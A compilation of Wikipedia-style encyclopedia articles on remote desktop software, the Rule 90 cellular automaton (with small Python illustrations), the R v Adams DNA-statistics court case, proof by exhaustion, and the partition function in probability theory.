Remote desktop software can be used to access a remote computer: a physical personalcomputerto which a user does not have physical access, but that can be accessed or interacted with.[4]Unlikeservers, remote computers are mainly used for peer to peer connections, where one device is unattended. A remote computer connection is generally only possible if both devices have anetworkconnection.
Since the advent ofcloud computingremote desktop software can be housed onUSB hardware devices, allowing users to connect the device to any PC connected to their network or the Internet and recreate their desktop via a connection to the cloud. This model avoids one problem with remote desktop software, which requires the local computer to be switched on at the time when the user wishes to access it remotely. (It is possible with a router with C2S VPN support, andwake on LANequipment, to establish avirtual private network(VPN) connection with the router over the Internet if not connected to theLAN, switch on a computer connected to the router, then connect to it.)
Remote desktop products are available in three models: hosted service, software, and appliance.
Tech support scammersuse remote desktop software to connect to their victim's computer and will often lock out the computer if the victim does not cooperate.
Remote desktopprotocolsinclude the following:
Aremote access trojan(RAT, sometimes calledcreepware)[6]is a type ofmalwarethat controls a system through a remote network connection. Whiledesktop sharingandremote administrationhave many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of aTrojan horse, and will try to hide its operation from the victim and fromcomputer security softwareand other anti-virus software.[7][8][9][10][11][12]
|
https://en.wikipedia.org/wiki/Remote_desktop_software
|
In themathematicalstudy ofcellular automata,Rule 90is anelementary cellular automatonbased on theexclusive orfunction. It consists of a one-dimensional array of cells, each of which can hold either a 0 or a 1 value. In each time step all values are simultaneously replaced by theXORof their two neighboring values.[1]Martin, Odlyzko & Wolfram (1984)call it "the simplest non-trivial cellular automaton",[2]and it is described extensively inStephen Wolfram's 2002 bookA New Kind of Science.[3]
When started from a single live cell, Rule 90 has a time-space diagram in the form of aSierpiński triangle. The behavior of any other configuration can be explained as a superposition of copies of this pattern, combined using theexclusive orfunction. Any configuration with only finitely many nonzero cells becomes areplicatorthat eventually fills the array with copies of itself. When Rule 90 is started from arandominitial configuration, its configuration remains random at each time step. Its time-space diagram forms many triangular "windows" of different sizes, patterns that form when a consecutive row of cells becomes simultaneously zero and then cells with value 1 gradually move into this row from both ends.
Some of the earliest studies of Rule 90 were made in connection with an unsolved problem innumber theory,Gilbreath's conjecture, on the differences of consecutiveprime numbers.
This rule is also connected to number theory in a different way, viaGould's sequence. This sequence counts the number of nonzero cells in each time step after starting Rule 90 with a single live cell.
Its values arepowers of two, with exponents equal to the number of nonzero digits in thebinary representationof the step number. Other applications of Rule 90 have included the design oftapestries.
Every configuration of Rule 90 has exactly four predecessors, other configurations that form the given configuration after a single step. Therefore, in contrast to many other cellular automata such as Conway's Game of Life, Rule 90 has no Garden of Eden, a configuration with no predecessors. It provides an example of a cellular automaton that is surjective (each configuration has a predecessor) but not injective (it has sets of more than one configuration with the same successor). It follows from the Garden of Eden theorem that Rule 90 is pre-injective: any two distinct configurations with the same successor differ in infinitely many cells.
Rule 90 is anelementary cellular automaton. That means that it consists of a one-dimensional array of cells, each of which holds a single binary value, either 0 or 1. An assignment of values to all of the cells is called aconfiguration. The automaton is given an initial configuration, and then progresses through other configurations in a sequence of discrete time steps. At each step, all cells are updated simultaneously. A pre-specified rule determines the new value of each cell as a function of its previous value and of the values in its two neighboring cells. All cells obey the same rule, which may be given either as a formula or as a rule table that specifies the new value for each possible combination of neighboring values.[1]
In the case of Rule 90, each cell's new value is the exclusive or of the two neighboring values. Equivalently, the next state of this particular automaton is governed by the following rule table:[1]

current pattern:            111  110  101  100  011  010  001  000
new state for center cell:   0    1    0    1    1    0    1    0
The name of Rule 90 comes from Stephen Wolfram's binary-decimal notation for one-dimensional cellular automaton rules. To calculate the notation for the rule, concatenate the new states in the rule table into a single binary number, and convert the number into decimal: 01011010₂ = 90₁₀.[1] Rule 90 has also been called the Sierpiński automaton, due to the characteristic Sierpiński triangle shape it generates,[4] and the Martin–Odlyzko–Wolfram cellular automaton after the early research of Olivier Martin, Andrew M. Odlyzko, and Stephen Wolfram (1984) on this automaton.[5]
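The XOR update rule and the derivation of the number 90 can be sketched in a few lines (the function name is illustrative; the row is grown by zero padding at each step):

```python
# One step of Rule 90 on a finite row (cells beyond the ends are 0):
# each new cell is the XOR of its two old neighbors.
def rule90_step(cells):
    p = [0, 0] + cells + [0, 0]   # pad so the pattern can grow outward
    return [p[i - 1] ^ p[i + 1] for i in range(1, len(p) - 1)]

# Wolfram code: list the new state for each neighborhood from 111
# down to 000 and read the resulting bits as a binary number.
new_states = []
for neighborhood in range(7, -1, -1):
    left = (neighborhood >> 2) & 1
    right = neighborhood & 1
    new_states.append(left ^ right)   # center cell is ignored

rule_number = int("".join(map(str, new_states)), 2)
```

Starting from a single live cell, successive applications of `rule90_step` produce the rows of the Sierpiński triangle described below.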
A configuration in Rule 90 can be partitioned into two subsets of cells that do not interact with each other. One of these two subsets consists of the cells in even positions at even time steps and the cells in odd positions in odd time steps. The other subset consists of the cells in even positions at odd time steps and the cells in odd positions at even time steps. Each of these two subsets can be viewed as a cellular automaton with only its half of the cells.[6]The rule for the automaton within each of these subsets is equivalent (except for a shift by half a cell per time step) to anotherelementary cellular automaton,Rule 102, in which the new state of each cell is the exclusive or of its old state and its right neighbor. That is, the behavior of Rule 90 is essentially the same as the behavior of two interleaved copies of Rule 102.[7]
Rule 90 and Rule 102 are called additive cellular automata. This means that, if two initial states are combined by computing the exclusive or of each of their cells, then their subsequent configurations will be combined in the same way. More generally, one can partition any configuration of Rule 90 into two subsets with disjoint nonzero cells, evolve the two subsets separately, and compute each successive configuration of the original automaton as the exclusive or of the configurations on the same time steps of the two subsets.[2]
The Rule 90 automaton (in its equivalent form on one of the two independent subsets of alternating cells) was investigated in the early 1970s, in an attempt to gain additional insight intoGilbreath's conjectureon the differences of consecutiveprime numbers. In the triangle of numbers generated from the primes by repeatedly applying theforward difference operator, it appears that most values are either 0 or 2. In particular, Gilbreath's conjecture asserts that the leftmost values in each row of this triangle are all 0 or 2. When a contiguous subsequence of values in one row of the triangle are all 0 or 2, then Rule 90 can be used to determine the corresponding subsequence in the next row.Miller (1970)explained the rule by a metaphor of tree growth in a forest, entitling his paper on the subject "Periodic forests of stunted trees". In this metaphor, a tree begins growing at each position of the initial configuration whose value is 1, and this forest of trees then grows simultaneously, to a new height above the ground at each time step. Each nonzero cell at each time step represents a position that is occupied by a growing tree branch. At each successive time step, a branch can grow into one of the two cells above it to its left and right only when there is no other branch competing for the same cell. A forest of trees growing according to these rules has exactly the same behavior as Rule 90.[8]
From any initial configuration of Rule 90, one may form a mathematical forest, a directed acyclic graph in which every vertex has at most one outgoing edge, whose trees are the same as the trees in Miller's metaphor. The forest has a vertex for each pair (x, i) such that cell x is nonzero at time i. The vertices at time 0 have no outgoing edges; each one forms the root of a tree in the forest. For each vertex (x, i) with i nonzero, its outgoing edge goes to (x ± 1, i − 1), the unique nonzero neighbor of x in time step i − 1. Miller observed that these forests develop triangular "clearings", regions of the time-space diagram with no nonzero cells, bounded by a flat bottom edge and diagonal sides. Such a clearing is formed when a consecutive sequence of cells becomes zero simultaneously in one time step, and then (in the tree metaphor) branches grow inwards, eventually re-covering the cells of the sequence.[8]
For random initial conditions, the boundaries between the trees formed in this way themselves shift in a seemingly random pattern, and trees frequently die out altogether. But by means of the theory ofshift registershe and others were able to find initial conditions in which the trees all remain alive forever, the pattern of growth repeats periodically, and all of the clearings can be guaranteed to remain bounded in size.[8][9]Miller used these repeating patterns to form the designs oftapestries. Some of Miller's tapestries depict physical trees; others visualize the Rule 90 automaton using abstract patterns of triangles.[8]
The time-space diagram of Rule 90 is a plot in which the i-th row records the configuration of the automaton at step i. When the initial state has a single nonzero cell, this diagram has the appearance of the Sierpiński triangle, a fractal formed by combining triangles into larger triangles. Rules 18, 22, 26, 82, 146, 154, 210 and 218 also generate Sierpiński triangles from a single cell, although not all of them do so in exactly the same way. One way to explain this structure uses the fact that, in Rule 90, each cell is the exclusive or of its two neighbors. Because this is equivalent to modulo-2 addition, the rule generates the modulo-2 version of Pascal's triangle. The diagram has a 1 wherever Pascal's triangle has an odd number, and a 0 wherever Pascal's triangle has an even number. This is a discrete version of the Sierpiński triangle.[1][10]
The number of live cells in each row of this pattern is a power of two. In the i-th row, it equals 2^k, where k is the number of nonzero digits in the binary representation of the number i. The sequence of these numbers of live cells, 1, 2, 2, 4, 2, 4, 4, 8, ..., is known as Gould's sequence.
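Gould's sequence can be computed directly from the binary representation of the row number and cross-checked against a direct simulation of the automaton (a short sketch; the helper names are illustrative):

```python
# Row i of Rule 90, started from a single live cell, contains
# 2**k live cells, where k is the number of 1 bits in i.
def gould(i):
    return 2 ** bin(i).count("1")

first_rows = [gould(i) for i in range(8)]

# Cross-check by simulating Rule 90 itself.
def rule90_step(cells):
    p = [0, 0] + cells + [0, 0]
    return [p[j - 1] ^ p[j + 1] for j in range(1, len(p) - 1)]

cells, simulated = [1], []
for _ in range(8):
    simulated.append(sum(cells))   # live cells in the current row
    cells = rule90_step(cells)
```

Both computations give the same counts for the first eight rows.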
Starting from a single live cell, the number of live cells over time follows a sawtooth pattern: at some time steps it grows arbitrarily large, while at others it returns, infinitely often, to only two live cells. The growth rate of this pattern has a characteristic growing sawtooth wave shape that can be used to recognize physical processes that behave similarly to Rule 90.[4]
The Sierpiński triangle also occurs in a more subtle way in the evolution of any configuration in Rule 90. At any time stepiin the Rule's evolution, the state of any cell can be calculated as the exclusive or of a subset of the cells in the initial configuration. That subset has the same shape as theith row of the Sierpiński triangle.[11]
In the Sierpiński triangle, for any integeri, the rows numbered by multiples of2ihave nonzero cells spaced at least2iunits apart. Therefore, because of the additive property of Rule 90, if an initial configuration consists of a finite patternPof nonzero cells with width less than2i, then in steps that are multiples of2i, the configuration will consist of copies ofPspaced at least2iunits from start to start. This spacing is wide enough to prevent the copies from interfering with each other. The number of copies is the same as the number of nonzero cells in the corresponding row of the Sierpiński triangle. Thus, in this rule, every pattern is areplicator: it generates multiple copies of itself that spread out across the configuration, eventually filling the whole array. Other rules including theVon Neumann universal constructor,Codd's cellular automaton, andLangton's loopsalso have replicators that work by carrying and copying a sequence of instructions for building themselves. In contrast, the replication in Rule 90 is trivial and automatic.[12]
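The replication property follows from additivity and can be checked directly: after 2^k steps, a pattern narrower than 2^k cells reappears as two copies shifted 2^k cells to each side. A small sketch (pattern chosen arbitrarily):

```python
# Rule 90 is additive, so after 2**k steps a finite pattern of width
# less than 2**k appears as two non-overlapping copies of itself,
# shifted 2**k cells to the left and right.
def rule90_step(cells):
    p = [0, 0] + cells + [0, 0]
    return [p[i - 1] ^ p[i + 1] for i in range(1, len(p) - 1)]

pattern = [1, 1, 0, 1]        # arbitrary pattern of width 4 < 2**3
cells = pattern[:]
for _ in range(8):             # run 2**3 = 8 steps
    cells = rule90_step(cells)

# The row grows by one cell on each side per step, so after 8 steps
# it is 20 cells wide: the pattern, 12 zeros, then the pattern again
# (copy starts 16 = 2 * 8 cells apart).
expected = pattern + [0] * 12 + pattern
```

The check works for any pattern narrower than the chosen power of two, matching the replicator behavior described above.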
In Rule 90, on an infinite one-dimensional lattice, every configuration has exactly four predecessor configurations. This is because, in a predecessor, any two consecutive cells may have any combination of states, but once those two cells' states are chosen, there is only one consistent choice for the states of the remaining cells. Therefore, there is noGarden of Edenin Rule 90, a configuration with no predecessors. The Rule 90 configuration consisting of a single nonzero cell (with all other cells zero) has no predecessors that have finitely many nonzeros. However, this configuration is not a Garden of Eden because it does have predecessors with infinitely many nonzeros.[13]
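The "exactly four predecessors" argument can be sketched on a finite window: choose the first two cells of a predecessor freely, after which every remaining cell is forced, since a target row t of length n and a predecessor p of length n + 2 satisfy t[j] = p[j] XOR p[j+2]. (The function names below are illustrative.)

```python
def predecessors(t):
    """All Rule 90 predecessors (length n+2) of a target row t of
    length n: the first two cells are free, the rest are forced."""
    preds = []
    for p0 in (0, 1):
        for p1 in (0, 1):
            p = [p0, p1]
            for j in range(len(t)):
                p.append(t[j] ^ p[j])   # p[j+2] = t[j] XOR p[j]
            preds.append(p)
    return preds

def step_inner(p):
    # Rule 90 applied to the interior cells of p.
    return [p[i - 1] ^ p[i + 1] for i in range(1, len(p) - 1)]

target = [1, 0, 1, 1, 0]
preds = predecessors(target)
```

Each of the four choices of the two free cells yields a distinct predecessor, and each predecessor steps forward to the target row.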
The fact that every configuration has a predecessor may be summarized by saying that Rule 90 issurjective. The function that maps each configuration to its successor is, mathematically, a surjective function. Rule 90 is also notinjective. In an injective rule, every two different configurations have different successors, but Rule 90 has pairs of configurations with the same successor. Rule 90 provides an example of a cellular automaton that is surjective but not injective. TheGarden of Eden theoremof Moore and Myhill implies that every injective cellular automaton must be surjective, but this example shows that the converse is not true.[13][14]
Because each configuration has only a bounded number of predecessors, the evolution of Rule 90 preserves theentropyof any configuration. In particular, if an infinite initial configuration is selected by choosing the state of each cell independently at random, with each of the two states being equally likely to be selected, then each subsequent configuration can be described by exactly the same probability distribution.[2]
Many other cellular automata and other computational systems are capable of emulating the behavior of Rule 90. For instance, a configuration in Rule 90 may be translated into a configuration of a different elementary cellular automaton, Rule 22. The translation replaces each Rule 90 cell by three consecutive Rule 22 cells. These cells are all zero if the Rule 90 cell is itself zero. A nonzero Rule 90 cell is translated into a one followed by two zeros. With this transformation, every six steps of the Rule 22 automaton simulate a single step of the Rule 90 automaton. Similar direct simulations of Rule 90 are also possible for the elementary cellular automata Rule 45 and Rule 126, for certain string rewriting systems and tag systems, and in some two-dimensional cellular automata including Wireworld. Rule 90 can also simulate itself in the same way: if each cell of a Rule 90 configuration is replaced by a pair of consecutive cells, the first containing the original cell's value and the second containing zero, then this doubled configuration has the same behavior as the original configuration at half the speed.[15]
Various other cellular automata are known to support replicators, patterns that make copies of themselves, and most share the same behavior as in the tree growth model for Rule 90. A new copy is placed to either side of the replicator pattern, as long as the space there is empty. However, if two replicators both attempt to copy themselves into the same position, then the space remains blank. In either case the replicators themselves vanish, leaving their copies to carry on the replication. A standard example of this behavior is the "bowtie pasta" pattern in the two-dimensionalHighLiferule. This rule behaves in many ways like Conway's Game of Life, but such a small replicator does not exist in Life. Whenever an automaton supports replicators with the same growth pattern, one-dimensional arrays of replicators can be used to simulate Rule 90.[16]Rule 90 (on finite rows of cells) can also be simulated by the blockoscillatorsof the two-dimensionalLife-like cellular automatonB36/S125, also called "2x2", and the behavior of Rule 90 can be used to characterize the possible periods of these oscillators.[17]
|
https://en.wikipedia.org/wiki/Rule_90
|
R v Adams [1996] EWCA Crim 10 and 222 are rulings in the United Kingdom that banned the expression in court of headline (soundbite), standalone Bayesian statistics from the reasoning admissible before a jury in DNA evidence cases, in favour of the calculated average (and maximal) number of matching incidences among the nation's population. The facts involved strong but inconclusive evidence conflicting with the DNA evidence, leading to a retrial.
A rape victim described her attacker as in his twenties. A suspect, Denis Adams, wasarrestedand anidentity paradewas arranged. The woman failed to pick him out, and on being asked if he fitted her description replied in the negative. She had described a man in his twenties and when asked how old Adams looked, she replied about forty. Adams was 37; he had analibifor the night in question, his girlfriend saying he had spent the night with her. The DNA was the only incriminating evidence heard by the jury, as all the other evidence pointed towards innocence.
TheDNA profileof the suspect fitted that ofevidenceleft at the scene. Thedefenceargued that the matchprobabilityfigure put forward by the prosecution (1 in 200 million) was incorrect, and that a figure of 1 in 20 million, or perhaps even 1 in 2 million, was more appropriate. The issue of how the jury should resolve the conflicting evidence was addressed by the defence by a formalstatistical method. The jury was instructed in the use ofBayes's theoremby ProfessorPeter DonnellyofOxford University. The judge told the jury they could use Bayes's theorem if they wished. Adams was convicted and the case went to appeal. TheAppeal Courtjudges noted that the original trial judge did not direct the jury as to what to do if they did not wish to use Bayes's theorem and ordered a retrial.
At the retrial the defence team again wanted to instruct the new jury in the use of Bayes's theorem (though Prof. Donnelly had doubts about the practicality of the approach).[1]The judge asked that the statistical experts from both sides work together to produce a workable method of implementing Bayes's theorem for use in a courtroom, should the jury wish to use it. Aquestionnairewas produced which asked a series of questions such as:
These questions were intended to allow theBayes factorsof the various pieces of evidence to be assessed. The questionnaires had boxes where jurors could put their assessments and a formula to enable them to produce the overalloddsofguiltorinnocence. Adams was convicted once again and again an appeal was made to the Court of Appeal. The appeal was unsuccessful but the Appeal Court ruling was highly critical of the appropriateness of Bayes's theorem in the courtroom.
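The arithmetic the questionnaire asked of jurors, combining a prior with a Bayes factor for each piece of evidence to obtain posterior odds, can be sketched as follows. All numbers below are invented for illustration and are not the figures from the case.

```python
# Illustrative only: posterior odds = prior odds x product of the
# Bayes factors for the individual pieces of evidence.
# Every number here is hypothetical, NOT taken from R v Adams.
prior_odds = 1 / 200_000            # odds of guilt before any evidence

bayes_factors = {
    "DNA match": 2_000_000,          # strongly favours guilt
    "failed identification": 1 / 10, # favours innocence
    "alibi": 1 / 2,                  # favours innocence
}

posterior_odds = prior_odds
for factor in bayes_factors.values():
    posterior_odds *= factor

# Convert odds to a probability of guilt.
posterior_probability = posterior_odds / (1 + posterior_odds)
```

The point of the exercise, and of the defence's argument, is that evidence favouring innocence (factors below 1) can substantially offset even a very large DNA match factor.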
The only evidence against Adams was the DNA evidence. His age was substantially different from that reported by the victim, the victim did not identify him and he had an alibi which was never disproved. The 1 in 200 million match probability calculation did not allow for the fact that the perpetrator might be a close relative of the defendant – an important point, since the defendant had a half-brother in his 20s whose DNA was never tested.
The Court of Appeal after the appeal wrote the guidelines for the way that match probabilities should be explained to jurors. Judges should say something along the lines of the following.
|
https://en.wikipedia.org/wiki/R_v_Adams
|
Proof by exhaustion, also known as proof by cases, proof by case analysis, complete induction or the brute force method, is a method of mathematical proof in which the statement to be proved is split into a finite number of cases or sets of equivalent cases, and where each type of case is checked to see if the proposition in question holds.[1] This is a method of direct proof. A proof by exhaustion typically contains two stages:
The prevalence of digital computers has greatly increased the convenience of using the method of exhaustion (e.g., the first computer-assisted proof of the four color theorem in 1976), though such approaches can also be challenged on the basis of mathematical elegance. Expert systems can be used to arrive at answers to many of the questions posed to them. In theory, the proof by exhaustion method can be used whenever the number of cases is finite. However, because most mathematical sets are infinite, this method is rarely used to derive general mathematical results.[2]
In the Curry–Howard isomorphism, proof by exhaustion and case analysis are related to ML-style pattern matching.[citation needed]
Proof by exhaustion can be used to prove that if an integer is a perfect cube, then it must be either a multiple of 9, 1 more than a multiple of 9, or 1 less than a multiple of 9.[3]
Proof: Each perfect cube is the cube of some integer n, where n is either a multiple of 3, 1 more than a multiple of 3, or 1 less than a multiple of 3. So these three cases are exhaustive:
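The case analysis can also be sanity-checked by brute force. A minimal Python sketch (the function name is illustrative) verifies over a finite range that a cube's residue mod 9 is always 0, 1, or 8 (that is, one less than a multiple of 9):

```python
# A cube's residue mod 9 can only be 0 (a multiple of 9), 1 (one more than
# a multiple of 9), or 8 (one less than a multiple of 9).
def cube_residue_mod_9(n: int) -> int:
    return (n ** 3) % 9

# Exhaustively check a finite range of integers:
residues = {cube_residue_mod_9(n) for n in range(-1000, 1001)}
assert residues == {0, 1, 8}
```

Of course, the finite check is only a sanity test; it is the three cases above that cover every integer.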
Mathematicians prefer to avoid proofs by exhaustion with large numbers of cases, which are viewed as inelegant. An illustration of how such proofs might be inelegant is to look at the following proofs that all modern Summer Olympic Games are held in years which are divisible by 4:
Proof: The first modern Summer Olympics were held in 1896, and then every 4 years thereafter (neglecting exceptional situations such as when the games' schedule was disrupted by World War I, World War II and the COVID-19 pandemic). Since 1896 = 474 × 4 is divisible by 4, the next Olympics would be in year 474 × 4 + 4 = (474 + 1) × 4, which is also divisible by four, and so on (this is a proof by mathematical induction). Therefore, the statement is proved.
The statement can also be proved by exhaustion by listing out every year in which the Summer Olympics were held, and checking that every one of them can be divided by four. With 28 total Summer Olympics as of 2016, this is a proof by exhaustion with 28 cases.
In addition to being less elegant, the proof by exhaustion will also require an extra case each time a new Summer Olympics is held. This is to be contrasted with the proof by mathematical induction, which proves the statement indefinitely into the future.
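The two styles of proof can be contrasted in code. The sketch below assumes, for illustration, the quadrennial schedule from 1896 through 2016 (ignoring cancelled Games):

```python
# Proof by exhaustion: enumerate every year and check each case separately.
olympic_years = list(range(1896, 2017, 4))   # assumed schedule: 1896, 1900, ..., 2016
assert all(year % 4 == 0 for year in olympic_years)

# Proof by induction: one base case plus one inductive step suffice,
# no matter how many Games are eventually held.
assert 1896 % 4 == 0                          # base case: 1896 = 474 * 4
assert all((y + 4) % 4 == 0                   # step: if y is divisible by 4, so is y + 4
           for y in olympic_years if y % 4 == 0)
```

The exhaustive version needs a longer list every four years; the inductive version never changes.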
There is no upper limit to the number of cases allowed in a proof by exhaustion. Sometimes there are only two or three cases. Sometimes there may be thousands or even millions. For example, rigorously solving a chess endgame puzzle might involve considering a very large number of possible positions in the game tree of that problem.
The first proof of the four colour theorem was a proof by exhaustion with 1834 cases.[4] This proof was controversial because the majority of the cases were checked by a computer program, not by hand. The shortest known proof of the four colour theorem today still has over 600 cases.
In general the probability of an error in the whole proof increases with the number of cases. A proof with a large number of cases leaves an impression that the theorem is only true by coincidence, and not because of some underlying principle or connection. Other types of proofs—such as proof by induction (mathematical induction)—are considered more elegant. However, there are some important theorems for which no other method of proof has been found, such as
|
https://en.wikipedia.org/wiki/Proof_by_exhaustion
|
The partition function or configuration integral, as used in probability theory, information theory and dynamical systems, is a generalization of the definition of a partition function in statistical mechanics. It is a special case of a normalizing constant in probability theory, for the Boltzmann distribution. The partition function occurs in many problems of probability theory because, in situations where there is a natural symmetry, its associated probability measure, the Gibbs measure, has the Markov property. This means that the partition function occurs not only in physical systems with translation symmetry, but also in such varied settings as neural networks (the Hopfield network), and applications such as genomics, corpus linguistics and artificial intelligence, which employ Markov networks and Markov logic networks. The Gibbs measure is also the unique measure that has the property of maximizing the entropy for a fixed expectation value of the energy; this underlies the appearance of the partition function in maximum entropy methods and the algorithms derived therefrom.
The partition function ties together many different concepts, and thus offers a general framework in which many different kinds of quantities may be calculated. In particular, it shows how to calculate expectation values and Green's functions, forming a bridge to Fredholm theory. It also provides a natural setting for the information geometry approach to information theory, where the Fisher information metric can be understood to be a correlation function derived from the partition function; it happens to define a Riemannian manifold.
When the setting for random variables is on complex projective space or projective Hilbert space, geometrized with the Fubini–Study metric, the theory of quantum mechanics and more generally quantum field theory results. In these theories, the partition function is heavily exploited in the path integral formulation, with great success, leading to many formulas nearly identical to those reviewed here. However, because the underlying measure space is complex-valued, as opposed to the real-valued simplex of probability theory, an extra factor of i appears in many formulas. Tracking this factor is troublesome, and is not done here. This article focuses primarily on classical probability theory, where the probabilities sum to one.
Given a set of random variables $X_i$ taking on values $x_i$, and some sort of potential function or Hamiltonian $H(x_1, x_2, \dots)$, the partition function is defined as
$$Z(\beta) = \sum_{x_i} \exp\left(-\beta H(x_1, x_2, \dots)\right)$$
The function $H$ is understood to be a real-valued function on the space of states $\{X_1, X_2, \dots\}$, while $\beta$ is a real-valued free parameter (conventionally, the inverse temperature). The sum over the $x_i$ is understood to be a sum over all possible values that each of the random variables $X_i$ may take. Thus, the sum is to be replaced by an integral when the $X_i$ are continuous, rather than discrete. In that case, one writes
$$Z(\beta) = \int \exp\left(-\beta H(x_1, x_2, \dots)\right)\, dx_1\, dx_2 \cdots$$
for the case of continuously-varying $X_i$.
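For a finite discrete system the defining sum can be computed directly. The sketch below uses a hypothetical two-spin Hamiltonian $H(x_1, x_2) = -x_1 x_2$ with states $x_i \in \{-1, +1\}$ (an illustrative choice, not taken from the text):

```python
import itertools
import math

# Hypothetical Hamiltonian: two coupled spins, H(x1, x2) = -x1 * x2.
def H(x1, x2):
    return -x1 * x2

def partition_function(beta, states=(-1, +1)):
    """Z(beta) = sum over all configurations (x1, x2) of exp(-beta * H)."""
    return sum(math.exp(-beta * H(x1, x2))
               for x1, x2 in itertools.product(states, repeat=2))

# The two aligned configurations each contribute e^beta and the two
# anti-aligned ones e^(-beta), so Z = 2*e^beta + 2*e^(-beta):
assert abs(partition_function(1.0) - (2 * math.e + 2 / math.e)) < 1e-12
```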
When $H$ is an observable, such as a finite-dimensional matrix or an infinite-dimensional Hilbert space operator or element of a C-star algebra, it is common to express the summation as a trace, so that
$$Z(\beta) = \operatorname{tr}\left(\exp\left(-\beta H\right)\right)$$
When $H$ is infinite-dimensional, then, for the above notation to be valid, the argument must be trace class, that is, of a form such that the summation exists and is bounded.
The number of variables $X_i$ need not be countable, in which case the sums are to be replaced by functional integrals. Although there are many notations for functional integrals, a common one would be
$$Z = \int \mathcal{D}\varphi \exp\left(-\beta H[\varphi]\right)$$
Such is the case for the partition function in quantum field theory.
A common, useful modification to the partition function is to introduce auxiliary functions. This allows, for example, the partition function to be used as a generating function for correlation functions. This is discussed in greater detail below.
The role or meaning of the parameter $\beta$ can be understood in a variety of different ways. In classical thermodynamics, it is an inverse temperature. More generally, one would say that it is the variable that is conjugate to some (arbitrary) function $H$ of the random variables $X$. The word conjugate here is used in the sense of conjugate generalized coordinates in Lagrangian mechanics, thus, properly $\beta$ is a Lagrange multiplier. It is not uncommonly called the generalized force. All of these concepts have in common the idea that one value is meant to be kept fixed, as others, interconnected in some complicated way, are allowed to vary. In the current case, the value to be kept fixed is the expectation value of $H$, even as many different probability distributions can give rise to exactly this same (fixed) value.
For the general case, one considers a set of functions $\{H_k(x_1, \dots)\}$ that each depend on the random variables $X_i$. These functions are chosen because one wants to hold their expectation values constant, for one reason or another. To constrain the expectation values in this way, one applies the method of Lagrange multipliers. In the general case, maximum entropy methods illustrate the manner in which this is done.
Some specific examples are in order. In basic thermodynamics problems, when using the canonical ensemble, the use of just one parameter $\beta$ reflects the fact that there is only one expectation value that must be held constant: the energy (due to conservation of energy). For chemistry problems involving chemical reactions, the grand canonical ensemble provides the appropriate foundation, and there are two Lagrange multipliers. One is to hold the energy constant, and another, the fugacity, is to hold the particle count constant (as chemical reactions involve the recombination of a fixed number of atoms).
For the general case, one has
$$Z(\beta) = \sum_{x_i} \exp\left(-\sum_k \beta_k H_k(x_i)\right)$$
with $\beta = (\beta_1, \beta_2, \dots)$ a point in a space.
For a collection of observables $H_k$, one would write
$$Z(\beta) = \operatorname{tr}\left[\exp\left(-\sum_k \beta_k H_k\right)\right]$$
As before, it is presumed that the argument of $\operatorname{tr}$ is trace class.
The corresponding Gibbs measure then provides a probability distribution such that the expectation value of each $H_k$ is a fixed value. More precisely, one has
$$\frac{\partial}{\partial \beta_k}\left(-\log Z\right) = \langle H_k \rangle = \operatorname{E}\left[H_k\right]$$
with the angle brackets $\langle H_k \rangle$ denoting the expected value of $H_k$, and $\operatorname{E}[\,\cdot\,]$ being a common alternative notation. A precise definition of this expectation value is given below.
Although the value of $\beta$ is commonly taken to be real, it need not be, in general; this is discussed in the section Normalization below. The values of $\beta$ can be understood to be the coordinates of points in a space; this space is in fact a manifold, as sketched below. The study of these spaces as manifolds constitutes the field of information geometry.
The potential function itself commonly takes the form of a sum:
$$H(x_1, x_2, \dots) = \sum_s V(s)$$
where the sum over $s$ is a sum over some subset of the power set $P(X)$ of the set $X = \{x_1, x_2, \dots\}$. For example, in statistical mechanics, such as the Ising model, the sum is over pairs of nearest neighbors. In probability theory, such as Markov networks, the sum might be over the cliques of a graph; so, for the Ising model and other lattice models, the maximal cliques are edges.
The fact that the potential function can be written as a sum usually reflects the fact that it is invariant under the action of a group symmetry, such as translational invariance. Such symmetries can be discrete or continuous; they materialize in the correlation functions for the random variables (discussed below). Thus a symmetry in the Hamiltonian becomes a symmetry of the correlation function (and vice versa).
This symmetry has a critically important interpretation in probability theory: it implies that the Gibbs measure has the Markov property; that is, it is independent of the random variables in a certain way, or, equivalently, the measure is identical on the equivalence classes of the symmetry. This leads to the widespread appearance of the partition function in problems with the Markov property, such as Hopfield networks.
The value of the expression $\exp\left(-\beta H(x_1, x_2, \dots)\right)$ can be interpreted as a likelihood that a specific configuration of values $(x_1, x_2, \dots)$ occurs in the system. Thus, given a specific configuration $(x_1, x_2, \dots)$,
$$P(x_1, x_2, \dots) = \frac{1}{Z(\beta)} \exp\left(-\beta H(x_1, x_2, \dots)\right)$$
is the probability of the configuration $(x_1, x_2, \dots)$ occurring in the system, which is now properly normalized so that $0 \le P(x_1, x_2, \dots) \le 1$, and such that the sum over all configurations totals to one. As such, the partition function can be understood to provide a measure (a probability measure) on the probability space; formally, it is called the Gibbs measure. It generalizes the narrower concepts of the grand canonical ensemble and canonical ensemble in statistical mechanics.
There exists at least one configuration $(x_1, x_2, \dots)$ for which the probability is maximized; this configuration is conventionally called the ground state. If the configuration is unique, the ground state is said to be non-degenerate, and the system is said to be ergodic; otherwise the ground state is degenerate. The ground state may or may not commute with the generators of the symmetry; if it commutes, it is said to be an invariant measure. When it does not commute, the symmetry is said to be spontaneously broken.
Conditions under which a ground state exists and is unique are given by the Karush–Kuhn–Tucker conditions; these conditions are commonly used to justify the use of the Gibbs measure in maximum-entropy problems.[citation needed]
The values taken by $\beta$ depend on the mathematical space over which the random field varies. Thus, real-valued random fields take values on a simplex: this is the geometrical way of saying that the sum of probabilities must total to one. For quantum mechanics, the random variables range over complex projective space (or complex-valued projective Hilbert space), where the random variables are interpreted as probability amplitudes. The emphasis here is on the word projective, as the amplitudes are still normalized to one. The normalization for the potential function is the Jacobian for the appropriate mathematical space: it is 1 for ordinary probabilities, and $i$ for Hilbert space; thus, in quantum field theory, one sees $itH$ in the exponential, rather than $\beta H$. The partition function is very heavily exploited in the path integral formulation of quantum field theory, to great effect. The theory there is very nearly identical to that presented here, aside from this difference, and the fact that it is usually formulated on four-dimensional space-time, rather than in a general way.
The partition function is commonly used as a probability-generating function for expectation values of various functions of the random variables. So, for example, taking $\beta$ as an adjustable parameter, the derivative of $\log(Z(\beta))$ with respect to $\beta$
$$\operatorname{E}[H] = \langle H \rangle = -\frac{\partial \log(Z(\beta))}{\partial \beta}$$
gives the average (expectation value) of $H$. In physics, this would be called the average energy of the system.
Given the definition of the probability measure above, the expectation value of any function $f$ of the random variables $X$ may now be written as expected: so, for discrete-valued $X$, one writes
